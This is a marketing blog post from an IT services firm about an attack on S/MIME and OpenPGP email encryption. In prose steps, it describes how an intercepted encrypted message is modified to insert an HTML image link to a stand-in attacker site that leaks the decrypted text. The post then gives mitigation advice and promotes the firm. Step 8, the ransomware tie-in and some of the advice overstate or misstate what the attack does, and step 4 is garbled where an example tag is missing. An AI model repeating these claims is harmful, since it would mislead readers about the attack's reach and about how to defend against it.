Email Encryption Protocols Vulnerable To Attack

Email Encryption ProtocolsThere are many methods for securing the sending and receiving of emails through an open network such as the internet. From email clients, firewall technology, network intrusion tools, and common sense, emails should be, by in large, free from the fetters of malicious attacks. With today’s technologies this statement is essentially true and we as end users can rest assured that our Internet Service Providers in conjunction with their protocols offer a safe haven for the transfer of data such as our email.

There are those however who want an additional layer of protection in order to offer a higher level of security. These end users add a layer of encryption that inherently acts as a stopgap even when the emails are hijacked either through transmission or storage vulnerabilities. In other words, the hijacker may have your emails, but they are encrypted so there is really no harm other than the emails are gone and there is a vulnerability in your transfer protocol.

However, I offer the following scenario.

Imagine if the encryption method you are currently applying were perverted into a tool to help the hijacker attack not only you but others in your email network? In other words, what if an encryption protocol that has been around since the nineties helps the attacker in stealing your data and the data of those on your list of email addresses? In addition, this same encryption protocol opens the door to your network and allows the flood of malicious software to pervade your company’s network. Something along the lines of the many Crypto-Viruses that have invaded many work places and exposed them to millions of dollars in ransom monies.

This may sound out of the realm of possibility, but that exact thing has happened with two of the most common encryption protocols. The following is a description of the intrusion method as well as the methodology for securing your email servers and clients.

The two security protocols that have been compromised are S/MIME (Secure/Multipurpose Internet Mail Extensions) and OpenPGP (Pretty Good Privacy). These two protocols considered staples in the industry offer a unique method for an email to be compromised and then sent to either the recipient or the originator of the email. Once opened the email is decrypted thus exposing an ex-filtration channel such as an HTML hyperlink which then sends the plain text to the attacker’s website. The following is the method for inserting the ex filtration text into a subject email.

  1. The email is captured either through a man-in-the-middle network scenario, a compromised SMTP server, or even an IMAP account on the server.
  2. The email is then stored on the attacker’s server for the use of a set of tools that can compromise the encryption protocol. These tools have the moniker ‘malleability tools’.
  3. The exfiltration text (HTML link) is then inserted using those tools as an encrypted block. The email does not need to be decrypted as the vulnerability in the protocol is not the encryption algorithms, but how the encrypted data is stored and validated (MDC).
  4. The Hyperlink text uses the tag to insert something similar too which forces the email client to download an image from unsafewebsite.ru.
  5. The email is then sent to either the originator or the recipient with the FROM:, DATE:, and SUBJECT: fields manipulated to look like a legitimate email.
  6. Upon receipt of the email the decryption takes place using the private and public keys of the encryption that is maintained on the client and the HTML link is exposed.
  7. The email client then executes the HTML ex-filtration link. This is a weakness in the client as the assumption is made that since the email came in as encrypted it is not necessary to verify the link as non-malicious. In other words, the encryption is the security and therefore no testing for malicious links is necessary.
  8. Once compromised the attacker’s server has full access to the clients work station and anyone else that shares the network.

This very brief and very rudimentary explanation of the attack scenario offers an insight into the simplicity of how easy it is to compromise the protocol to become the tool of the attacker. It is the integrity of the protocol that allows for the intrusion as it is a trusted entity that for years has not been questioned.

With all of this being said, how does one help ensure that your clients emails are free from this type of intrusion. In other words, what does the expertly trained staff at MHD Communications offer to make sure that your emails are not vulnerable to this type of attack.

  1. The email client is updated to check all links and image links whether encrypted or not to make sure that none are malicious in nature. Most email clients offer this option.
  2. S/MIME cannot be updated to circumvent the intrusion through the use of malleability tools therefore OpenPGP or some other encryption protocol should be used.
  3. Update OpenPGP to look for invalid Modification Detection Codes and drop any offending blocks. In addition, OpenPGP should send an alert that such blocks were encountered, and the entire message should be considered suspect.
    Update firewalls to include malicious websites that have the ability to use malleability tools upon emails and are known to be suspect in their reliability.
  4. Ultimately the safest and most reliable method for ensuring that an email is safe is to use secure VPN tunnels across the expanse of a private network. In addition, either a cloud or local based email server that is under complete control of a trained staff of experts should be used in order to maintain reliability.

Control is the key to overall prevention of security intrusions. MHD Communications and its staff offer a myriad of options that can help ensure that not only your email service, but all services are virtually intrusion free. It is with the utmost care and pride that MHD Communications delivers expedient and expert service to all its clients. We at MHD Communications want to offer you that same safety net and in doing so allow you, our family of clients, to work in a productive environment. We look forward to serving you in the future.